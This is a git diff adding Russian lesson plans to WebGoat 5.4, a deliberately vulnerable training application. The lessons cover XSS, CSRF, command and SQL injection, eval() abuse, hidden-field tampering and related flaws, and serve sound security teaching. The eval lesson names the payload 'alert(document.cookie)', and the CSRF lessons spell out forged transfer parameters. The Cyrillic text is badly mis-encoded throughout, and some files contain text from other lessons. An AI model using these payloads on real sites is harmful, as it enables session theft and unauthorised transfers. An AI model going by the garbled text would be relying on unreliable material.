+Đ’ данном Ńроке на ŃŃ‚ĐľŃ€ĐľĐ˝Ń ĐşĐ»Đ¸ĐµĐ˝Ń‚Đ° бŃдет отправлено очень много информации, что ŃоздаŃŃ‚ Ńерьёзные проблемы Ń ĐşĐľĐ˝Ń‚Ń€ĐľĐ»ĐµĐĽ Đ´ĐľŃŃ‚Ńпа Đş ней.
+
+ĐžŃновные цели и задачи:
+Đ’Đ°ŃĐ° цель ŃĐľŃтоит в том, чтоб Ńреди принимаемых ŃĐľ Ńтороны Ńервера данных найти Ń‚Ń
+информацию, Đ´ĐľŃŃ‚Ńпа Đş которой Ń Đ˛Đ°Ń Đ˝ĐµŃ‚.
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/ru/ClientSideValidation.html b/webgoat-5.4/src/main/webapp/lesson_plans/ru/ClientSideValidation.html
new file mode 100644
index 000000000..ccc490f83
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/ru/ClientSideValidation.html
@@ -0,0 +1,14 @@
+
+
Название Ńрока: Insecure Client Storage
+
Тема для изŃчения:
+
+ХороŃей практикой являетŃŃŹ проверка на Ńтороне Ńервера абŃолютно вŃех принимаемых данных.
+Реализация механизмов проверки только на Ńтороне клиента делает приложение Ńязвимым.
+Запомните, вŃŃ‘ что отправляетŃŃŹ на ŃŃ‚ĐľŃ€ĐľĐ˝Ń ĐşĐ»Đ¸ĐµĐ˝Ń‚Đ° не должно Ńодержать критичеŃки важных
+данных или механизмов.
+
+ĐžŃновные цели:
+Đ’ данном Ńпражнении первая ваŃĐ° задача - обнарŃжить дейŃтвŃющий код ĐşŃпона обеŃпечивающего ŃкидкŃ.
+Далее необходимо иŃŃледовать механизм проверки вводимых данных и добитьŃŃŹ покŃпки товара Đ·Đ° Đ˝ŃлевŃŃŽ ценŃ.
+
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/ru/CommandInjection.html b/webgoat-5.4/src/main/webapp/lesson_plans/ru/CommandInjection.html
new file mode 100644
index 000000000..f30ac8a45
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/ru/CommandInjection.html
@@ -0,0 +1,18 @@
+
+
Название Ńрока: ĐŃпользование инъекций команд
+
Тема для изŃчения:
+
+Đтаки клаŃŃĐ° "Đнъекция команд" предŃтавляют Ńобой ŃерьёзнŃŃŽ ŃĐłŃ€ĐľĐ·Ń Đ´Đ»ŃŹ Ńайтов принимающих
+от пользователей какие-либо данные. Методика их иŃпользования Đ´ĐľŃтаточно тривиальна, но в тоже
+время они могŃŃ‚ приводить Đş полной компрометации атакованной ŃиŃтемы. НеŃмотря на ŃŤŃ‚Đľ количеŃтво
+приложений имеющих подобные ŃязвимоŃти неŃклонно раŃŃ‚Ń‘Ń‚.ĐžŃновные цели и задачи:
+ПопробŃйте найти ŃязвимоŃŃ‚ŃŚ через которŃŃŽ можно выполнить какŃŃŽ-нибŃĐ´ŃŚ ĐşĐľĐĽĐ°Đ˝Đ´Ń ĐľĐżĐµŃ€Đ°Ń†Đ¸ĐľĐ˝Đ˝ĐľĐą ŃиŃтемы.
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/ru/ConcurrencyCart.html b/webgoat-5.4/src/main/webapp/lesson_plans/ru/ConcurrencyCart.html
new file mode 100644
index 000000000..1ddbda659
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/ru/ConcurrencyCart.html
@@ -0,0 +1,31 @@
+
+
+
+
+ План Ńрока
+
+
+
+
+
Название Ńрока: УязвимоŃŃ‚ŃŚ при одновременной работе Ń Ń‚ĐľĐ˛Đ°Ń€Đ˝ĐľĐą корзиной
+
Тема для изŃчения:
+
+Веб-приложения могŃŃ‚ обрабатывать множеŃтво HTTP-запроŃов одновременно.
+ЧаŃŃ‚Đľ разработчики иŃпользŃŃŽŃ‚ конŃŃ‚Ń€Ńкции не приŃпоŃобленные Đş многопоточной работе, и
+ŃŤŃ‚Đľ Ńоздаёт возможноŃŃ‚ŃŚ иŃпользования ĐľŃибок Ńвязанных Ń ĐľĐ´Đ˝ĐľĐ˛Ń€ĐµĐĽĐµĐ˝Đ˝Ń‹ĐĽĐ¸ обращениями.
+Например когда одна и Ń‚Đ° же Ńтраница открываетŃŃŹ одновременно разными пользователями и один их них видит
+на ней данные Đ´Ń€Ńгого.
+Под приŃпоŃобленноŃŃ‚ŃŚŃŽ Đş многопоточной работе подразŃмеваетŃŃŹ ŃпоŃобноŃŃ‚ŃŚ полей клаŃŃов и объектов
+вŃегда находитьŃŃŹ в верном ŃĐľŃтоянии при выполнении множеŃтва одних и тех же операций вызываемых
+разными потоками. ПоŃĐşĐľĐ»ŃŚĐşŃ Đ˛Ńе потоки иŃпользŃŃŽŃ‚ одно и Ń‚Đľ же рабочее проŃтранŃтво вызываемых методов, и в данном
+проŃтранŃтве хранятŃŃŹ данные вŃех ŃвойŃтв отдельно взятых клаŃŃов, Ń‚Đľ множеŃтвенные одновременные попытки
+обращений Đş ним могŃŃ‚ привеŃти Đş неожиданным резŃльтатам.ĐžŃновные цели:
+Đ’Đ°ŃĐ° цель - проэкŃплŃатировать ŃязвимоŃŃ‚ŃŚ этого типа для того чтоб полŃчить возможноŃŃ‚ŃŚ покŃпать товары по заниженной цене.
+
+
Название Ńрока: Как проводить атаки межŃайтового Ńкриптинга (XSS)
+
Тема для изŃчения:
+
+ХороŃей практикой вŃегда ŃчиталаŃŃŚ очиŃтка вŃех входящих данных, ĐľŃобенно когда
+их Ńодержимое бŃĐ´ŃŃ‚ иŃпользовано в качеŃтве команд ОС, Ńкриптов или запроŃов Đş
+Đ‘Đ”. ĐŃ‚Đľ важно и для тех данных, которые бŃĐ´ŃŃ‚ Ńохранены где-Ń‚Đľ
+внŃтри приложения. ПоŃетители не должны иметь возможноŃŃ‚ŃŚ ĐżŃбликации на Ńайте
+таких Ńообщений, которые могŃŃ‚ изменять ŃŃ‚Ń€ŃктŃŃ€Ń Ńтраницы при их проŃмотре.
+ĐžŃновные цели и задачи:
+На данном Ńроке вы наŃчитеŃŃŚ иŃпользовать хранимые и отражаемые XSS-ŃязвимоŃти.
+Đ’ конце вам придётŃŃŹ внеŃти изменения в код приложения для ŃŃтранения данных ŃязвимоŃтей.
+
+
Название Ńрока: CSRF, обход мезанизмов подтверждений
+
Тема для изŃчения:
+На данном Ńроке вы наŃчитеŃŃŚ проводить CSRF-нападения в обход механизмов подтверждения операций.
+
+
+Как работает данный клаŃŃ Đ°Ń‚Đ°Đş:
+
+CSRF являетŃŃŹ таким видом Đ°Ń‚Đ°Đş, при проведении которых браŃзер жертвы, без её ведома, отправляет
+на целевой Ńайт запроŃŃ‹ Đ˝Ńжные злоŃĐĽŃ‹ŃленникŃ. Đногда, при проведении важных операций, Ńервер может
+запроŃить Ń ĐżĐľĐ»ŃŚĐ·ĐľĐ˛Đ°Ń‚ĐµĐ»ŃŹ их подтверждение. Đтот ход может показатьŃŃŹ реŃением проблем Ńвязанных Ń CSRF,
+но только не в ŃĐ»Ńчаях когда подтверждение реализовано ŃредŃтвами JavaScript. На данном Ńроке вы наŃчитеŃŃŚ
+обходить такие варианты подтверждений, как одиночных, Ń‚Đ°Đş и многочиŃленных. РеŃением бŃдет являтьŃŃŹ Ń‚Đ° же поŃылка
+поддельных запроŃов, но Ńже не одного, Đ° неŃкольких.
+
+
+
+
Цели и задачи:
+
+Как и в проŃлом Ńроке, ваŃей целью являетŃŃŹ отправка электронного пиŃŃŚĐĽĐ° в новоŃŃ‚Đ˝ŃŃŽ грŃппŃ. ПиŃŃŚĐĽĐľ, при проŃмотре,
+должно вызывать ĐľŃ‚ĐżŃ€Đ°Đ˛ĐşŃ Đ˝ĐµŃкольких поддельных запроŃов: первый на ĐľŃŃщеŃтвление денежного перевода, второй на
+его подтверждение. Сначала URL, по ĐşĐľŃ‚ĐľŃ€ĐľĐĽŃ Đ±Ńдет произведено обращение, должен Ńодержать параметр "transferFunds",
+равный "4000", затем его же, но ŃĐľ значением "CONFIRM". ПоŃле того как Ńообщение отобразитŃŃŹ на экране, браŃзер любого
+кто его Ńвидит ŃĐ°ĐĽ Ńделает вŃŃ‘ что Đ˝Ńжно. Đ’ конце работы обновите текŃщŃŃŽ ŃтраницŃ. Đ•Ńли задание выполнено верно, Ń‚Đľ в
+главном меню, на против этого Ńрока, появитŃŃŹ зелёная отметка.
+
+
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/ru/CsrfTokenByPass.html b/webgoat-5.4/src/main/webapp/lesson_plans/ru/CsrfTokenByPass.html
new file mode 100644
index 000000000..f2e0de169
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/ru/CsrfTokenByPass.html
@@ -0,0 +1,41 @@
+
+
Название Ńрока: Обход CSRF-защиты ĐľŃнованной на токенах
+
Тема для изŃчения:
+На данном Ńроке вы наŃчитеŃŃŚ ĐľŃŃщеŃтвлять CSRF-нападения на Ńайты, иŃпользŃющие токены в качеŃтве защиты
+от CSRF-атак.
+
+
+Как работают эти атаки:
+
+
+CSRF-атаки Đ·Đ°Ńтавляют браŃзер жертвы ĐľŃŃщеŃтвлять необходимые злоŃĐĽŃ‹ŃĐ»ĐµĐ˝Đ˝Đ¸ĐşŃ Đ·Đ°ĐżŃ€ĐľŃŃ‹
+Đş Ń†ĐµĐ»ĐµĐ˛ĐľĐĽŃ ŃĐµŃ€Đ˛ĐµŃ€Ń Đ˛ невидимом режиме. ĐŃ‚Đľ позволяет Đ°Ń‚Đ°ĐşŃŃŽŃ‰ĐµĐĽŃ Đ˛Ń‹Đ·Ń‹Đ˛Đ°Ń‚ŃŚ выполнение различных операций
+от лица атакованного пользователя Ń ĐµĐłĐľ правами и привилегиями.
+
+
ĐŃтентификация запроŃов принимаемых от поŃетителей, ĐľŃнованная на Ńникальных токенах, предотвращает
+возможноŃŃ‚ŃŚ CSRF-нападений. При иŃпользовании данной техники, при отправке важного запроŃĐ°, ŃерверŃ
+передаётŃŃŹ Ńникальный для каждого клиента токен, наличие которого подтверждает его легитимноŃŃ‚ŃŚ.
+Проект OWASP CSRFGuard как раз иŃпользŃет такой подход, позволяя защитить приложения от CSRF-нападений.
+
+
+
+Тем не менее, данный вид защиты можно обойти. Для этого Đ´ĐľŃтаточно обнарŃжить на Đ°Ń‚Đ°ĐşŃемом Ńайте XSS-ŃязвимоŃŃ‚ŃŚ.
+Đ•Ń‘ наличие поможет отправлять запроŃŃ‹ от имени жертвы, ведь ŃиŃтемы безопаŃноŃти вŃех браŃзеров,
+ĐľŃнованных на политике одного иŃточника, не запрещают обращатьŃŃŹ Đş текŃŃ‰ĐµĐĽŃ Đ´ĐľĐĽĐµĐ˝Ń.
+
+
+
ĐžŃновные цели и задачи:
+
+Как и в проŃлом Ńроке, ваŃей целью являетŃŃŹ отправка пиŃŃŚĐĽĐ° в новоŃŃ‚Đ˝ŃŃŽ грŃĐżĐżŃ Đ´Đ»ŃŹ вызова нелегитимного
+перевода денег. Для её Đ´ĐľŃтижения вам необходимо Ńзнать дейŃтвŃющий токен. Он находитŃŃŹ в коде Ńтраницы на
+которой раŃположена форма перевода денег. Для того чтоб Ńвидеть формŃ, необходимо Đş текŃŃ‰ĐµĐĽŃ URL
+допиŃĐ°Ń‚ŃŚ параметр "transferFunds=main". ЗагрŃзите ŃŤŃ‚Ń ŃтраницŃ, Ńчитайте оттŃĐ´Đ° значение токена и ĐľŃŃщеŃтвите перевод.
+Đ’ конце работы обновите текŃщŃŃŽ ŃтраницŃ. Đ•Ńли задание выполнено верно, Ń‚Đľ в главном меню, на против этого Ńрока,
+появитŃŃŹ зелёная отметка.
+
+
+
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/ru/DBCrossSiteScripting.html b/webgoat-5.4/src/main/webapp/lesson_plans/ru/DBCrossSiteScripting.html
new file mode 100644
index 000000000..913efa53b
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/ru/DBCrossSiteScripting.html
@@ -0,0 +1,21 @@
+
+
Название Ńрока: Как проводить атаки межŃайтового Ńкриптинга (XSS)
+
Тема для изŃчения:
+
+ХороŃей практикой вŃегда ŃчиталаŃŃŚ очиŃтка вŃех входящих данных, ĐľŃобенно когда
+их Ńодержимое бŃĐ´ŃŃ‚ иŃпользовано в качеŃтве команд ОС, Ńкриптов или запроŃов Đş
+Đ‘Đ”. ĐŃ‚Đľ важно и для тех данных, которые бŃĐ´ŃŃ‚ Ńохранены где-Ń‚Đľ
+внŃтри приложения. ПоŃетители не должны иметь возможноŃŃ‚ŃŚ ĐżŃбликации на Ńайте
+таких Ńообщений, которые могŃŃ‚ изменять ŃŃ‚Ń€ŃктŃŃ€Ń Ńтраницы при их проŃмотре.
+ĐžŃновные цели:
+Đ’ данном Ńпражнении вы наŃчитеŃŃŚ ĐľŃŃщеŃтвлять хранимые XSS-атаки.
+Đ’ конце Ńрока вам необходимо бŃдет внеŃти изменения в код базы данных для того, чтоб предотвратить подобые нападения.
+
+
Lesson Plan Title: How to Perform SQL Injection
+
Concept / Topic To Teach:
+
+It is always a good practice to scrub all inputs, especially those
+inputs that will later be used as parameters to OS commands, scripts,
+and database queries. Users should not be able to alter the intent of
+commands that are executed on the server, in many cases as a privileged user.
+
+General Goal(s):
+For this exercise, you will perform a SQL Injection attack.
+You will also implement code changes in the database to defeat
+these attacks.
+
+
Название Ńрока: Выполнение атаки клаŃŃĐ° 'DOM-инъекция'.
+
Тема для изŃчения:
+Выполнение атаки клаŃŃĐ° 'DOM-инъекция'.
+
+
+Как работают атаки данного вида:
+
+Некое приложение иŃпользŃет технологию AJAX для манипŃлирования DOM Ńтраницы и его обновления
+по ŃредŃтвам JavaScript, DHTML и Ń„Ńнкции eval().
+Đ’ данном ŃĐ»Ńчае Đ°Ń‚Đ°ĐşŃющий может каким-либо образом попытатьŃŃŹ прехватить ответ Ńервера, и помеŃтить
+в него набор вредоноŃных JavaScript-команд.
+
ĐžŃновные цели и задачи:
+
+* Đ’Đ°ŃĐ° жертва - ŃŤŃ‚Đľ ŃиŃтема требŃющая от клиентов ключ активации для её иŃпользования.
+
Название Ńрока: МежŃайтовый Ńкриптинг ĐľŃнованный на DOM (DOM XSS)
+
Тема для изŃчения:
+
+Объектная модель докŃмента (DOM), Ń Ń‚ĐľŃ‡ĐşĐ¸ зрения безопаноŃти, Ńоздаёт Ńобой ĐľĐ´Đ˝Ń Đ¸Đ˝Ń‚ĐµŃ€ĐµŃĐ˝ŃŃŽ проблемŃ.
+Она позволяет ŃĐľĐ´ĐµŃ€Đ¶Đ¸ĐĽĐľĐĽŃ Đ˛ĐµĐ±-Ńтраниц динамичеŃки менятьŃŃŹ, что ŃĐ°ĐĽĐľ по Ńебе являетŃŃŹ хороŃей возможноŃŃ‚ŃŚŃŽ
+не только для веб-ĐĽĐ°Ńтеров, но и для злоŃĐĽŃ‹Ńленников. С её помощью нападающие могŃŃ‚ помещать в код Ńтраниц
+вредоноŃные вŃтавки (XSS), еŃли в процеŃŃе модификации их Ńодержимого на Ńтороне клиента не проиŃходит
+Đ´ĐľŃтаточной проверки данных вводимых пользователем.
+
+
+ĐžŃновные цели и задачи:
+Đ’ данном Ńпражнении вам необходимо Ń Đ¸Ńпользованием этой ŃязвимоŃти помеŃтить вредоноŃный код
+в объектнŃŃŽ модель докŃмента. Рв Ńамом конце вы иŃправите ĐľŃĐ¸Đ±ĐşŃ ĐżŃ€Đ¸Đ˛ĐľĐ´ŃŹŃ‰ŃŃŽ Đş её появлению.
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/ru/DOS_Login.html b/webgoat-5.4/src/main/webapp/lesson_plans/ru/DOS_Login.html
new file mode 100644
index 000000000..460cd4100
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/ru/DOS_Login.html
@@ -0,0 +1,12 @@
+
+
Название Ńрока: Отказ в обŃĐ»Ńживании при неŃкольких одновременных попытках авторизации
+
Тема для изŃчения:
+
+Đтаки клаŃŃĐ° "Отказ в обŃĐ»Ńживании" являютŃŃŹ главной проблемой веб-приложений. СитŃации, при которых конечный пользователь
+долгое время не может полŃчить Đ´ĐľŃŃ‚ŃĐż Đş Đ˛Đ°Đ¶Đ˝ĐľĐĽŃ ĐżŃ€Đ¸Đ»ĐľĐ¶ĐµĐ˝Đ¸ŃŽ или ŃервиŃŃ, могŃŃ‚ принеŃти больŃие Ńбытки.
+ĐžŃновные цели и задачи:
+Данный Ńайт позволяет неŃкольким пользователям авторизироватьŃŃŹ одновременно. Đ’ Ń‚Đľ же время
+веб-приложение может ŃŃтанавливать Ń Đ‘Đ” только 2 Ńоединения Đ·Đ° раз. Đ’Ń‹ должны полŃчить
+ŃпиŃок ŃŃщеŃтвŃющих пользователей и попытатьŃŃŹ одновременно произвеŃти вход от 3 логинов.
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/ru/DangerousEval.html b/webgoat-5.4/src/main/webapp/lesson_plans/ru/DangerousEval.html
new file mode 100644
index 000000000..b3ee6b20a
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/ru/DangerousEval.html
@@ -0,0 +1,16 @@
+
+
Название Ńрока: ОпаŃное иŃпользование eval()
+
Тема для изŃчения:
+
+ХороŃей практикой являетŃŃŹ проверка на Ńтороне Ńервера вŃех принимаемых данных.
+Đ’ ŃĐ»Ńчаях когда непроверенные пользовательŃкие данные напрямŃŃŽ отражаютŃŃŹ в HTTP-ответе имеетŃŃŹ
+риŃĐş появления XSS-ŃязвимоŃтей. Đ’ текŃщем приложении не проходящие ĐżŃ€ĐľĐ˛ĐµŃ€ĐşŃ ĐżĐľĐ»ŃŚĐ·ĐľĐ˛Đ°Ń‚ĐµĐ»ŃŚŃкие данные помещаютŃŃŹ
+в ŃŃ‚Ń€ĐľĐşŃ ĐżĐµŃ€ĐµĐ´Đ°Đ˛Đ°ĐµĐĽŃŃŽ Ń„Ńнкции eval(). Đ’ подобных ŃитŃациях (они называютŃŃŹ отражёнными XSS-ŃязвимоŃтями)
+злоŃĐĽŃ‹Ńленник может ŃĐľŃтавить URL Ńодержащий Ńпециальные вредоноŃные вŃтавки, и опŃбликовать его
+на Ńтороннем веб-Ńайте, отправить по почте или любым Đ´Ń€Ńгим ŃпоŃобом донеŃти его Đ´Đľ жертвы.
+
+ĐžŃновные цели и задачи:
+Đ’Đ°ŃĐ° цель - добитьŃŃŹ выполнения произвольного JavaScript-кода в данном приложении иŃпользŃŃŹ
+Ńже имеющийŃŃŹ в Ńтранице вызов eval(). Для того чтоб ŃŃпеŃно заверŃить Ńрок вы дложны вызвать выполнение Ńтроки
+'alert(document.cookie)'.
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/ru/Encoding.html b/webgoat-5.4/src/main/webapp/lesson_plans/ru/Encoding.html
new file mode 100644
index 000000000..2d642a45b
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/ru/Encoding.html
@@ -0,0 +1,10 @@
+
+
Название Ńрока: ĐŃпользование ĐľŃновной кодировки
+
Тема для изŃчения:
+
+По множеŃŃ‚Đ˛Ń ĐżŃ€Đ¸Ń‡Đ¸Đ˝ Ńодержимое веб-приложения может хранитьŃŃŹ в неŃкольких разных кодировках.
+
+ĐžŃновные цели и задачи:
+Данный Ńрок предназначаетŃŃŹ для тех, кто знаком Ń ĐżĐľĐ˝ŃŹŃ‚Đ¸ĐµĐĽ кодировок и понимает
+чем они отличаютŃŃŹ Đ´Ń€ŃĐł от Đ´Ń€Ńга.
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/ru/FailOpenAuthentication.html b/webgoat-5.4/src/main/webapp/lesson_plans/ru/FailOpenAuthentication.html
new file mode 100644
index 000000000..ff90da904
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/ru/FailOpenAuthentication.html
@@ -0,0 +1,13 @@
+
+
Название Ńрока: ĐŃпользование ŃязвимоŃтей ложной Đ°Ńтентификации
+
Тема для изŃчения:
+
+ На данном Ńроке вы ознакомитеŃŃŚ Ń ĐľŃновами возникновения ŃŃловий, приводящих Đş
+ ложной Đ°Ńтентификации пользователей. Например, ложная Đ°Ńтентификация может проиŃходить в тех ŃĐ»Ńчаях,
+ когда возникающая в процеŃŃе работы приложения ĐľŃибка (например неперехваченное иŃключение)
+ не позволяет программе точно определить верноŃŃ‚ŃŚ вводимых пользователем данных.ĐžŃновные цели и задачи:
+Đ’Ń‹ должны обойти механизм проверки Đ°Ńтентификации.
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/ru/ForcedBrowsing.html b/webgoat-5.4/src/main/webapp/lesson_plans/ru/ForcedBrowsing.html
new file mode 100644
index 000000000..51d165243
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/ru/ForcedBrowsing.html
@@ -0,0 +1,22 @@
+
+
Название Ńрока: Обращение Đş Ńкрытым реŃŃŃ€ŃĐ°ĐĽ.
+
Тема для изŃчения:
+Как производить обращение Đş Ńкрытым реŃŃŃ€ŃĐ°ĐĽ
+
+
+Как работают такие атаки:
+
+ĐŃ‚Đ° техника иŃпользŃетŃŃŹ хакерами для обращения Đş тем реŃŃŃ€ŃĐ°ĐĽ, ŃŃылок на которые
+на Ńайте нет, но Đ´ĐľŃŃ‚ŃĐż Đş которым никак не ограничен.
+Одним из примеров такой техники являетŃŃŹ затирание чаŃти URL для того чтоб проŃмотреть Ńодержимое
+незащищённой директории.
+
ĐžŃновные цели и задачи:
+
+* Đ’Đ°Ńей целью являетŃŃŹ Ńгадывание URL интерфейŃĐ° конфигŃрации.
+
Название Ńрока: Как можно иŃпользовать ŃŃ‚Ń€Đ°Đ˝Đ¸Ń†Ń Đ˛ĐľŃŃтановления пароля
+
Тема для изŃчения:
+
+Веб-приложения очень чаŃŃ‚Đľ предоŃтавляют Ńвоим пользователям возможноŃŃ‚ŃŚ воŃŃтановления забытого пароля.
+Đš Ńожалению, во многих из них данный механизм реализован не безопаŃно. Đнформация, требŃемая для идентификации
+пользователя, как правило, очень проŃŃ‚Đ°.
+ĐžŃновные цели:
+Пользователи могŃŃ‚ воŃŃтановить их пароль еŃли Ń Đ˝Đ¸Ń… полŃчитŃŃŹ ответить на Ńекретный вопроŃ. На Ńтранице
+воŃŃтановления нет никаких мезанизмов Ńвязанных Ń Đ±Đ»ĐľĐşĐ¸Ń€ĐľĐ˛ĐşĐľĐą аккаŃнтов. Đ’Đ°Ńе имя пользователя - 'webgoat',
+любимый цвет - краŃный (red). Цель Ńрока - воŃŃтановить пароль Đş аккаŃĐ˝Ń‚Ń Đ´Ń€Ńгого пользователя.
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/ru/HiddenFieldTampering.html b/webgoat-5.4/src/main/webapp/lesson_plans/ru/HiddenFieldTampering.html
new file mode 100644
index 000000000..e30a55e33
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/ru/HiddenFieldTampering.html
@@ -0,0 +1,17 @@
+
+
Название Ńрока: ĐŃпользование Ńкрытых полей форм
+
Тема для изŃчения:
+
+Разработчики иŃпользŃŃŽŃ‚ Ńкрытые поля форм для хранения на загрŃженной клиентом Ńтранице
+информации Đľ ценах, авторизации, отŃлеживания переходов по ŃĐ°ĐąŃ‚Ń Đ¸ многом Đ´Ń€Ńгом.
+Очень чаŃŃ‚Đľ программиŃŃ‚Ń‹ пренебрегают проверкой данных полŃчаемых из них.
+На этом Ńроке вы наŃчитеŃŃŚ находить hidden-поля и изменять их Ńодержимое для того чтоб
+ŃŃтанавливать товарам Đ˝ŃжнŃŃŽ вам ценŃ.
+ ĐžŃновные цели и задачи:
+Пользователь должен манипŃлирŃŃŹ значениями Ńкрытых полей приобреŃти товар по ненаŃтоящей цене.
+
+ПопробŃйте заказать HDTV намного деŃевле чем он Ńтоит на Ńамом деле.
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/ru/HowToWork.html b/webgoat-5.4/src/main/webapp/lesson_plans/ru/HowToWork.html
new file mode 100644
index 000000000..f9f206c52
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/ru/HowToWork.html
@@ -0,0 +1,55 @@
+
+Как работать Ń WebGoat
+
+Добро пожаловать в краткŃŃŽ инŃŃ‚Ń€Ńкцию по работе Ń WebGoat.
+Đнформация Đľ Ńреде работы WebGoat
+
+WebGoat работает под Ńправлением Apache Tomcat. По Ńмолчанию он наŃтроен на Ń€Đ°Đ±ĐľŃ‚Ń Đ˝Đ° Ń…ĐľŃте localhost,
+однако в ŃĐ»Ńчае необходимоŃти имя Ń…ĐľŃŃ‚Đ° может быть легко изменено.
+Кроме того, по Ńмолчанию WebGoat наŃтроен на Ń€Đ°Đ±ĐľŃ‚Ń Đ»Đ¸ŃŃŚ Ń ĐľĐ´Đ˝Đ¸ĐĽ пользователем. Дополнительные Ńчётные запиŃи
+вы можете добавить в файле tomcat-users.xml.
+Đ•Ńли вы хотите иŃпользовать WebGoat в лаборатории или клаŃŃе вам обязательно Đ˝Ńжно изменить его базовŃŃŽ конфигŃрацию.
+Для этого пройдите в раздел "Введение" и прочтите ĐłĐ»Đ°Đ˛Ń "НаŃтройка Tomcat"
+
+
+ĐĐ˝Ń‚ĐµŃ€Ń„ĐµĐąŃ WebGoat
+
+
+РеŃение Ńроков
+
+Đ’Ńегда начинайте Ń€Đ°Đ±ĐľŃ‚Ń ĐżĐľ ĐżĐ»Đ°Đ˝Ń Ń‚ĐµĐşŃщего Ńрока. Đ•Ńли вдрŃĐł реŃить Ńрок Ń Đ˛Đ°Ń Đ˝Đ¸ĐşĐ°Đş не полŃчаетŃŃŹ,
+воŃпользŃйтеŃŃŚ подŃказками Đş немŃ. Đ’ том ŃĐ»Ńчае, еŃли Ńрок не полŃчаетŃŃŹ реŃить даже Ń ĐżĐľĐĽĐľŃ‰ŃŚŃŽ подŃказок
+вы можете поŃмотреть подробное его реŃение.
+Чтение и редактирование параметров
+
+Для чтения и редактирования параметров вам необходимо иметь локальный прокŃи-Ńервер ŃпоŃобный перехватывать
+HTTP-запроŃŃ‹. ЗдеŃŃŚ вы можете иŃпользовать WebScarab. Более подробнŃŃŽ информацию Đľ нём вы можете полŃчить в разделе
+"ĐŃпользŃемые инŃŃ‚Ń€Ńменты". ПоŃле ŃŃтановки WebScarab и наŃтройки браŃзера на Ń€Đ°Đ±ĐľŃ‚Ń Ń Đ˝Đ¸ĐĽ можно начинать прохождение Ńроков.
+
+ПроŃмотр и редактирование Cookies
+
+Почти вŃегда редактирование Cookies проиŃходит точно также как и редактирование параметров запроŃĐ°.
+Мы можем иŃпользовать WebScarab для перехвата запроŃĐ° и изменения значений имеющихŃŃŹ в нём Cookies
+точно также как опиŃывалоŃŃŚ выŃе.
+
+
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/ru/HtmlClues.html b/webgoat-5.4/src/main/webapp/lesson_plans/ru/HtmlClues.html
new file mode 100644
index 000000000..4272bcabf
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/ru/HtmlClues.html
@@ -0,0 +1,14 @@
+
+
Название Ńрока: How to Discover Clues in the HTML
+
Concept / Topic To Teach:
+
+Многие разработчики, Đş Ńожалению, забывают Ńдалять из рабочих верŃий кода вŃевозможные отметки типа FIXME, TODO, небольŃие хаки и Ń‚.Đ´.
+ ĐŃŃледование иŃходного кода на наличие различных комментариев , паролей, бэкдоров и прочего может очень
+Ńильно вам помочь. Ниже предŃтавлена форма авторизации. ПопробŃйте иŃŃледовать код Ńтраницы и найти
+зацепки которые позволят вам войти как легитимный пользователь.
+
+ĐžŃновные цели и задачи:
+Đ’Ń‹ должны обойти ŃиŃŃ‚ĐµĐĽŃ Đ°Đ˛Ń‚ĐľŃ€Đ¸Đ·Đ°Ń†Đ¸Đ¸.
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/ru/HttpBasics.html b/webgoat-5.4/src/main/webapp/lesson_plans/ru/HttpBasics.html
new file mode 100644
index 000000000..82fac4497
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/ru/HttpBasics.html
@@ -0,0 +1,33 @@
+
+
Название Ńрока: ĐžŃновы Http
+
Тема изŃчения:
+Đ’ данном Ńроке предŃтавлены ĐľŃновы необходимые для понимания процеŃŃĐ° передачи данных ĐĽĐµĐ¶Đ´Ń Đ±Ń€Đ°Ńзером и веб-приложением.
+
+Как работает HTTP:
+
+Đ’Ńе обращения по ĐżŃ€ĐľŃ‚ĐľĐşĐľĐ»Ń HTTP имеют один ĐľŃновной формат. Кажный Đ·Đ°ĐżŃ€ĐľŃ ĐşĐ»Đ¸ĐµĐ˝Ń‚Đ° или ответ Ńервера ŃĐľŃтоит из трёх чаŃтей:
+Ńтрока запроŃĐ° или ответа, заголовок и тело. Клиент начинает ĐżŃ€ĐµĐ´Đ°Ń‡Ń Đ´Đ°Đ˝Đ˝Ń‹Ń… ŃледŃющим образом:
+
+ Он ŃоединяетŃŃŹ Ń Ńервером и отправляет Đ·Đ°ĐżŃ€ĐľŃ Đ´Đ»ŃŹ полŃчения докŃмента
+
GET /index.html?param=value HTTP/1.0
+Далее он Ńлёт различнŃŃŽ информацию в разделе заголовка чтоб Ńведомить Ńервер Đľ Ńвоей конфигŃрации и возможноŃŃ‚ŃŹŃ…
+(например какие кодировки и типы докŃментов поддерживаютŃŃŹ клиентом).User-Agent: Mozilla/4.06
+ПоŃле отправки запроŃĐ° и заголовков клиент может отправить дополнительные данные. Они в больŃинŃтве ŃĐ»Ńчаев
